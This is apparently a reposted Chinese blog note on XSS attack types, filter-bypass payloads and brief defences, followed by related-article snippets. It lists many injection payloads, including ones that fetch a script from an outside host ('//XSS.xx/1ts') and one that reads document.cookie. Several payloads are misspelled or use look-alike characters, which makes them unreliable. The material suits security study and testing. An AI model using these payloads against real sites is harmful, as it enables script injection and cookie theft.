XSS攻击、BYPASS及防御

最新推荐文章于 2024-06-20 02:49:18 发布
最新推荐文章于 2024-06-20 02:49:18 发布
阅读量807 收藏
点赞数
分类专栏: 笔记 文章标签: xss 安全漏洞 web
原文链接:https://www.freebuf.com/articles/web/246205.html
版权

XSS攻击、BYPASS及防御

攻击

一、 反射型XSS

前端 -> 后端 -> 前端
在URL中+

  1. 一般存在在id=xxx
  2. 将xxx替换为,观察页面是否弹出”1”
  3. 若成功弹出,则存在反射型xss注入漏洞

二、 存储型XSS

前端 -> 后端 -> 数据库 -> 前端
输入框中的内容会存储在数据库中,然后回显在网页上

  1. 一般存在在留言框和页面搜索框中
2.	<script>alert(1)</script>
  1. 若成功弹出“1”,且在页面上有回显,则存在存储型XSS漏洞

三、 DOM型XSS

前端 HTML
输入框中的内容会出现在HTML标签中,通过构造payload,实现弹窗
例:<a href=’1’> Please check here!</a>
payload: #’oneclick=”alert(111)”>

  1. 一般存在搜索框中
  2. 查看网页源代码构造payload
  3. 若成功弹出“1”,且在页面上有回显,则存在DOM型XSS漏洞

bypass

<script>alert(1)</script>
  1. 大小写绕过
 <SCRIpt>AlerT(1)</SCRipt>
  1. HTML标签绕过
<img scr=javascript:alter(1)></img>
<img src=# onerror=alert(1)></img>
<img src=# onmoseover=alert(1)></img>
<IMG SRC=javascript:alert(&quot;XSS&quot;)>

使用TAB绕过:

<IMG SRC="jav ascript:alert('XSS');">
<a href=# onmouseover=alert(1)>text xss</a>
<a href="javascript:alert(/test/)">link</a>
<a onmouseover="alert(document.cookie)">xss link</a>
<iframe/οnlοad=alert(/1/);></iframe>
<svg/οnlοad=alert(/1/);>
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
<BODY BACKGROUND="javascript:alert('XSS')"> 
<IMG LOWSRC="javascript:alert('XSS')">
<svg/οnlοad=alert('XSS')>
  1. 特殊函数绕过
	<keygen autofocus οnfοcus=s=createElement(“scriPt”);body.appendChild(s);s.src=”//XSS.xx/1ts”>
<textarea autofocus οnfοcus=s=createElement(“scriPt”);body.appendChild(s);s.src=”//XSS.xx/1ts”>
  1. 关键字替换
" οnerrοr=alert(1) "
<BODY onload="alert('XSS')">
<IMG SRC="" onerror="alert('XSS')">
  1. 不常见标签绕过
<details open ontoggle=prompt(1)>
<button onfocus=prompt(1) autofocus>
<select autofocus οnfοcus=s=createElement(“scriPt”);body.appendChild(s);s.src=”//XSS.xx/1ts”>
  1. 双写绕过
" οnerrοr=alert(1) "
  1. ‐prompt(1)‐
  2. 编码转换
    十六进制
    HTML实体字符
  3. 引号被过滤
  1. 使用“/”替换单引号
  2. String.fromCharCode
    fromCharCode() 可接受一个指定的 Unicode 值,然后返回一个字符串
    括号中添加一个或多个unicode值
<script>alert(‘insight-labs’)</script>  —–>   <script>eval(String.fromCharCode(97,108,101,114,116,40,39,105,110,115,105,103,104,116,45,108,97,98,115,39,41))</script>
  1. location.hash
<script>eval(location.hash.slice(1))</script>#alert(‘a’)
  1. 重音符混淆绕过
<IMG SRC=javascript:alert("RSnake says, 'XSS'")>
  1. 空格被过滤
    %0a、%0b、&NewLine:含义是回车(Enter)
  2. 冒号被过滤
    &colon

漏洞修复

  1. 过滤输入的非法字符
  2. 对输出到页面的内容进行编码的转换,HTML、JavaScript等
戒罔
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
xssbypass_【渗透技巧】XSS三重URL编码绕过实例
weixin_30126409的博客
12-23 3947
0x00 前言跨站脚本攻击(Cross Site Scripting),缩写为XSS,恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。在黑盒渗透中,XSS在很多网站中普遍存在,这边分享一个简单有意思的XSS三重URL编码绕过漏洞实例。0x01 漏洞实例某次测试中,遇到一个很奇葩的XSS,我们先来加一个双...
XSSBypass:XSS绕过技术
05-17
- Web应用程序通常会使用过滤器来防止XSS攻击,但这些过滤器可能有漏洞或不够完善。攻击者可以通过编码、字符集转换、使用特殊字符、或者利用过滤器的逻辑漏洞来绕过防御。 - 例如,使用HTML实体编码、Base64编码...
XSS Bypass Cookbook
晓川吖的专栏
09-13 287
1 引言 在目前的web安全漏洞中,xss一直属于热门的一类,而它对用户造成的危害较大。 因此也引发了不少安全爱好者和专业工程师的研究。 而html5等新技术的使用和具体业务场景中复杂的环境带给了xss更大的生存空间。 而且不同xss向量也因为浏览器的特性会有所区别 比如chrome在加载资源时会校验服务器返回的mimeType 而firefox则根据标签自己设定的type来做出处理 本文在目前较为常见的几种过滤条件下,简单的探讨了xss这一技术的应用以及绕过 1.1 研究范围 XSS在各种具体业.
xssbypass_XSS Bypass
weixin_36463451的博客
12-23 271
如果无法学会绕过,那就只有一个结果:Bypass学习文章来源:米斯特安全团队JS代码往往要在标签内或者在 “On” 事件和 “javascript” 伪协议内才可以执行。标签表达式: 没被安全狗过滤的标签:a b q br dd dl dt h1 h2 h3 h4 h5 h6 hr bdi bdo big del dfn dir div kbd map var wbr abbr area base...
XSS跨站脚本攻击_反射型跨站脚本攻击需要过滤的字符
最新发布
2301_76224593的博客
06-20 968
跨站脚本(cross site script)为了避免与样式css混淆,所以简称为XSSXSS是一种经常出现在web应用中的计算机安全漏洞,也是web中最主流的攻击方式。那么什么是XSS呢?XSS是指恶意攻击者利用网站没有对用户提交数据进行转义处理或者过滤不足的缺点,进而添加一些代码,嵌入到web页面中去。使别的用户访问都会执行相应的嵌入代码。从而盗取用户资料、利用用户身份进行某种动作或者对访问者进行病毒侵害的一种攻击方式。1、盗取各类用户帐号,如机器登录帐号、用户网银帐号、各类管理员帐号。
xss and ssrf bypass 小tips
yggcwhat
04-26 1476
xss and ssrf bypass 小tips
xssbypass小记
weixin_30687051的博客
03-23 100
简单整理下bypass的一些点 标签外 如果是标签之外 又有htmlspecialchars函数的点 就别想了 在标签外同时能xss但是有长度限制 如果是储存型可以利用多个点 然后构造<script>标签 在中间利用/**/注释掉html代码 一点一点的组合payload 除此以外<svg/onload=alert(1)>应该是比较短的payload...
8. xss bypass
HWHXY的博客
01-17 280
layout: post title: 8. xss bypass category: SRC tags: SRC keywords: SRC,XSS 前言 该篇记录为记录实际的src过程第8篇小文章,内容为某网站的xssbypassXSS特征 这个点是一处app发布,可以插入a标签和img标签,但是a标签只能插入链接,否则会出错。条件很苛刻。 这时就想到了再找一个反射,把反射链接插进去,就相当于a+反射=点击存储。思路正确!开始找反射,好不容易找到一个,但是waf极强, on属性基本被消灭,遗留下来.
xss常见的bypass方案
03-06
为了防御XSS攻击,网站开发者应遵循以下最佳实践: - 对所有用户输入进行适当的过滤、转义或编码。 - 使用HTTP头部的Content-Security-Policy(CSP)来限制允许的资源加载和执行。 - 对敏感数据进行加密,避免在DOM...
xss_bypass_cookbook_4.0.pdf.zip_XSS
09-23
这份"XSS Bypass Cookbook 4.0"很可能是针对XSS过滤机制的破解策略大全,旨在帮助安全研究人员和开发人员更好地理解XSS攻击及其防御方法。 XSS攻击通常分为三种类型:反射型XSS、存储型XSS和DOM型XSS。反射型XSS是...
xss跨站脚本攻击汇总
07-24
xss 跨站脚本攻击汇总 xss 跨站脚本攻击是一种常见的 web 应用程序漏洞,攻击者可以inject 恶意脚本到网页中,从而获取用户的敏感信息或控制...因此,防御 xss 跨站脚本攻击需要使用多种安全机制和技术来防御攻击。
第十二节 利用IE特性绕过XSS过滤-01
09-15
这意味着攻击者可以使用这个特性来 bypass XSS 过滤。例如,攻击者可以使用 `(document.domain)">`来触发 XSS。 Payload 触发 XSS Payload 触发 XSS 是指攻击者使用特殊的 Payload 来触发 XSS 漏洞。例如,攻击者...
html中的基本标签
weixin_44956916的博客
09-12 161
Day 01学习笔记 一、讲在前面的知识 1.1 前端开发工程师在整个开发流程中的位置 产品经理:提需求 UI设计师 前端设计师 后端工程师 测试工程师 1.2 前后端开发 前端:也叫客户端 后端:也叫服务端 1.3软件结构 B/S:浏览器/服务器 客户端设备上有浏览器就可以 ​ 优点:免安装,更新更及时 ​ 缺点:没一次需要现下载代码,速度较c/s慢 C/S:客户端/服务器 需要在客户端设备上安装客户端软件 ​ 优点:速度快 ​ 缺点: 1
刚入门小黑客记一次对某站点的渗透测试(bypass)
kjuhfkicf154的博客
01-31 1429
渗透已授权。非授权渗透是违法行为!
深入学习2———url bypass的基本原理与过滤实验
这周末在做梦的博客
11-13 555
一,实验效果 访问http://bypass/302.php,跳转到百度首页。利用url bypass直接访问http://bypass/302.php?url=@localhost/flag.txt,显示跳转失败。 访问http://bypass/302.php?url=@localhost/file.php,得到flag。 成功从bypass地址跳转到localhost,并通过file.php得到爆出flag.txt中的内容。 本次实验效果中并未设置提示,请在实验原理中详细了解操作原因。 二,实验原理
网络安全-跨站脚本攻击(XSS)的原理、攻击及防御
热门推荐
关注网络安全、云原生安全
08-01 4万+
所用工具 Google出品:开源Web App漏洞测试环境:Firing Range 简介 跨站脚本攻击(全称Cross Site Scripting,为和CSS(层叠样式表)区分,简称为XSS)是指恶意攻击者在Web页面中插入恶意Script代码,当用户浏览网页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。 xss是攻击客户端,最终受害者是用户,网站管理员也是用户之一。 xss漏洞通常是通过php的输出函数将javascript代码输出到html页面中,通过.
xss攻击详解
剁椒鱼头没剁椒的博客
11-15 8217
XSS攻击通常指的是通过利用网页开发时留下的漏洞,通过巧妙的方法注入恶意指令代码到网页,使用户加载并执行攻击者恶意制造的网页程序。这些恶意网页程序通常是JavaScript,但实际上也可以包括Java、 VBScript、ActiveX、 Flash 或者甚至是普通的HTML。攻击成功后,攻击者可能得到包括但不限于更高的权限(如执行一些操作)、私密网页内容、会话和cookie等各种内容。
XSS攻击详解
xllllll___的博客
02-17 1526
1.盗用cookie,获取用户的敏感信息;2.利用iframe,frame等方式,以用户的身份执行一些管理动作,或者执行一些一般的行为比如说发私信,加好友等;3.在一些访问量极大的页面上进行XSS攻击可以攻击一些小型网站;4.利用一些可被攻击的域或者其它的域信任的特点,以受信任来源的身份请求一些平时不被允许的操作。
全网最详细 XSS 跨站脚本攻击,不是过来打死我!!
liuhyusb的博客
06-21 2569
​。
pdf xss攻击 如何防御
07-27
PDF XSS攻击是指通过在PDF文档中插入恶意代码来攻击用户的...总而言之,通过使用安全的解析器和过滤器、验证和过滤上传的PDF文件、更新软件补丁、使用沙盒技术以及提高用户意识和警惕性,可以有效地防御PDF XSS攻击
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值